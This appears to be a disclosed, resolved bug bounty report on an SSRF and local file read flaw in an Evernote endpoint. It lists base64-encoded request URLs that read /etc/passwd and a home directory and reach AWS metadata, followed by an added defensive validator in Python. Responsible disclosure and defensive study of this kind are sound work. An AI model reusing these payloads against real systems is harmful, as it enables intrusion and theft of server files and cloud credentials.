Full read SSRF in www.evernote.com that can leak aws metadata and local file inclusion

Critical
Evernote

Team Summary

Official summary from Evernote

## Summary:

The following endpoint was found to be vulnerable to SSRF: `https://www.evernote.com/ro/aHR0cDovLzE2OS4yNTQuMTY5LjI1NC8jdGVzdC5qcw==/-1430533899.js`

The endpoint takes a path in the URL and retrieves its content. It is supposed to be used on a path, but it can be used on a URL to get access to the internal network (SSRF). It can also be used with a file URI: local file inclusion.

## Steps To Reproduce:

### Leak local file:

* Open the following URL: https://www.evernote.com/ro/ZmlsZTovLy9ob21lL2FiZW5hdmlkZXMvIy5qcw==/-1430533899.js

The payload is the base64 encoding of: `file:///home/abenavides/#.js`

The `#` is used because the end of the URL must be in JavaScript, but to ignore it in the URI I put it after the `#`. It leaks the content of the directory:

███

You can also leak a file with: https://www.evernote.com/ro/ZmlsZTovLy9ldGMvcGFzc3dkIy5qcw==/-1430533899.js

███████

### SSRF:

You can also use a URL to trigger SSRF:

* To have access to AWS metadata you can use the following URL: https://www.evernote.com/ro/aHR0cDovLzE2OS4yNTQuMTY5LjI1NC8jLmpz/-1430533899.js

█████

## Impact

The impact is critical. An attacker can leak arbitrary files on the web server of www.evernote.com and access any internal host of Evernote, including AWS metadata with full response read. I didn't try to escalate the bug so as not to "cross the line", and because I think it clearly demonstrates the critical impact already.

Best regards.
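Added example (not Evernote's code and not part of the report): a defensive decoder for an endpoint of this shape, showing the validation order that rejects the URL, `file:` and `#.js` tokens quoted above while still serving ordinary relative paths. `ALLOWED_ROOT`, `encode_token` and `decode_ro_path` are assumed names.

```python
import base64
import posixpath
from typing import Optional
from urllib.parse import urlsplit

# Constructed example (not Evernote's code). The endpoint in the report takes a
# base64 token that should name a JavaScript file; these helpers show a
# validation order that closes the URL, file: and "#.js" tricks. Assumed names:
# ALLOWED_ROOT, encode_token, decode_ro_path.
ALLOWED_ROOT = "/static/js"  # assumed: the only tree the endpoint may read from


def encode_token(path: str) -> str:
    """How a legitimate caller would build the token for a relative path."""
    return base64.b64encode(path.encode("utf-8")).decode("ascii")


def decode_ro_path(token: str) -> Optional[str]:
    """Return the absolute file path to serve, or None if the token is unsafe."""
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    # A token carrying a scheme or host (http://..., file:///..., //host/...)
    # is a URL, not a path: this is the SSRF and local-file-read primitive.
    parts = urlsplit(raw)
    if parts.scheme or parts.netloc:
        return None
    # "#" and "?" let a caller satisfy a ".js" suffix check while the fetcher
    # ignores everything after them; a NUL byte plays the same role in C APIs.
    if any(ch in raw for ch in "#?\x00"):
        return None
    # Check the suffix on the decoded path, not on the outer URL.
    if not raw.endswith(".js"):
        return None
    # Collapse "../" and "//", then confine the result under ALLOWED_ROOT.
    normalized = posixpath.normpath("/" + raw)
    full = posixpath.join(ALLOWED_ROOT, normalized.lstrip("/"))
    if not full.startswith(ALLOWED_ROOT + "/"):
        return None
    return full
```

A lookup table from opaque ids to files removes the decoding step entirely and is the stronger fix; the validator above is the minimum for an endpoint that must keep accepting paths.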

Reported by neolex

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Weakness

Server-Side Request Forgery (SSRF)